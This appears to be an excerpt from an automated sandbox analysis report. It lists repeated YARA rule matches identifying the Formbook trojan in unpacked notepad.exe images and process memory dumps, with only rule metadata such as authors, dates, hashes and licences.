Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
